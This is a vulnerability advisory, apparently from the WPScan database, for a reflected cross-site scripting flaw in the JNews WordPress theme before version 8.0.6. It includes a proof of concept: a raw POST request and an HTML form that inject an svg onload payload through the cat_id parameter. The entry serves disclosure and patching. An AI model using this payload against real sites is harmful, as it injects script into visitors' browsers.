Themes Vulnerabilities
JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)
Description
The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
Proof of Concept
POST /?ajax-request=jnews HTTP/1.1
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Connection: close
lang=en_US&cat_id=6"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67
<html>
<body>
<form action="https://example.com/?ajax-request=jnews" method="POST">
<input type="hidden" name="lang" value="en_US" />
<input type="hidden" name="cat_id" value="6"><svg/onload=alert(/XSS/)>" />
<input type="hidden" name="action" value="jnews_build_mega_category_2" />
<input type="hidden" name="number" value="6" />
<input type="hidden" name="tags" value="70,64,10,67" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Themes
Fixed in 8.0.6 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Truoc Phan from Techlab Corporation
Submitter
Truoc Phan
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-24 (about 2 years ago)
Added
2021-05-24 (about 2 years ago)
Last Updated
2021-05-24 (about 2 years ago)
WPScan 